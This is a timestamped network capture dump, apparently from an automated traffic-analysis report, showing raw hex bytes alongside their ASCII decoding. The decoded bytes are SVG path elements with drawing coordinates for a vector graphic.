                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:54 UTC1371INData Raw: 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                                      Data Ascii: 25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:54 UTC1387INData Raw: 38 39 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 89,0,2.1,2.1,0,0,1,.16,2.85"/><path class="cls-4" d="M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:54 UTC1403INData Raw: 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30
                                                                                                                                                                                                                                                                                                      Data Ascii: 27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:54 UTC1419INData Raw: 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37
                                                                                                                                                                                                                                                                                                      Data Ascii: .51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1435INData Raw: 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34
                                                                                                                                                                                                                                                                                                      Data Ascii: 2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1451INData Raw: 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                                      Data Ascii: .52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1467INData Raw: 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32
                                                                                                                                                                                                                                                                                                      Data Ascii: 1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1483INData Raw: 22 20 64 3d 22 4d 38 37 39 2e 37 34 2c 32 39 39 2e 37 37 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 37 39 2c 33 30 32 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: " d="M879.74,299.77A1.72,1.72,0,0,1,879,302a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1499INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 36 35 2c 31 37 34 2e 32 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: "/><path class="cls-4" d="M896.65,174.25a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1515INData Raw: 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32
                                                                                                                                                                                                                                                                                                      Data Ascii: .12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M927.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1531INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 36 2e 38 38 2c 31 36 33 2e 37 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38
                                                                                                                                                                                                                                                                                                      Data Ascii: ><path class="cls-4" d="M1026.88,163.74a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1547INData Raw: 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 34 36 2c 32 39 34 2e 31 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 6-2.82"/><path class="cls-4" d="M1010.46,294.18a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1563INData Raw: 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39
                                                                                                                                                                                                                                                                                                      Data Ascii: 6,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1579INData Raw: 2c 31 38 30 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35
                                                                                                                                                                                                                                                                                                      Data Ascii: ,180a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1595INData Raw: 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1611INData Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                                                      Data Ascii: 2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><pa
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1627INData Raw: 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 34 31 2c 32 30 33 2e 30 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="cls-4" d="M875.41,203.05a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,
